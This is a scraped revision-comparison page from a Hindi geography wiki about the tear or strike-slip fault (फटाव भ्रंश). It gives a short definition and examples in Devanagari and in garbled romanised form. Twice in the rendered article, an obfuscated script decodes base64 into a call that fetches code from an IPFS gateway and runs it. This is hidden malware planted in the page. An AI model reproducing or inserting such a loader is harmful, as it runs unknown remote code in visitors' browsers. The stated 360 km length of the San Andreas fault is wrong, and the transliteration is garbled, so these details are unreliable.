Difference between revisions of "फटाव भ्रंश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} *खिंचाव की तीव्र प्रक्रिया के परिणामस्व...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''फटाव भ्रंश''' खिंचाव की तीव्र प्रक्रिया के परिणामस्वरूप उत्पन्न होने वाले ऐसे भ्रंश होते हैं जिनमें भ्रंश रेखा के सहारे क्षैतिज खिसकाव होता है।
*खिंचाव की तीव्र प्रक्रिया के परिणामस्वरूप उत्पन्न होने वाले ऐसे भ्रंश, जिनमें भ्रंश रेखा के सहारे क्षैतिज खिसकाव होता, '''फटाव भ्रंश''' कहलाते हैं।
 
 
*इनमें लम्बवत बल साधारण होने के कारण, क्षैतिज [[गति]] पायी जाती है।  
 
*इनमें लम्बवत बल साधारण होने के कारण, क्षैतिज [[गति]] पायी जाती है।  
 
*विश्व का सबसे लम्बा फटाव भ्रंश पश्चिमी कैलीफोर्निया में स्थित 'सान एण्ड्रियाजा' भ्रंश है जिसकी लम्बाई लगभग 360 किमी. है।  
 
*विश्व का सबसे लम्बा फटाव भ्रंश पश्चिमी कैलीफोर्निया में स्थित 'सान एण्ड्रियाजा' भ्रंश है जिसकी लम्बाई लगभग 360 किमी. है।  
Line 8: Line 7:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{भूगोल शब्दावली}}
[[Category:नया पन्ना मई-2012]]
+
[[Category:भूगोल शब्दावली]]
 
+
[[Category:भूगोल कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 14:00, 30 August 2014

phatav bhransh khianchav ki tivr prakriya ke parinamasvaroop utpann hone vale aise bhransh hote haian jinamean bhransh rekha ke sahare kshaitij khisakav hota hai.

  • inamean lambavat bal sadharan hone ke karan, kshaitij gati payi jati hai.
  • vishv ka sabase lamba phatav bhransh pashchimi kailiphorniya mean sthit 'san endriyaja' bhransh hai jisaki lambaee lagabhag 360 kimi. hai.
  • briten ka sabase b da phatav bhransh 'gret glen aauph sk aautalaiand' haian, jo 65 kimi. lamba hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>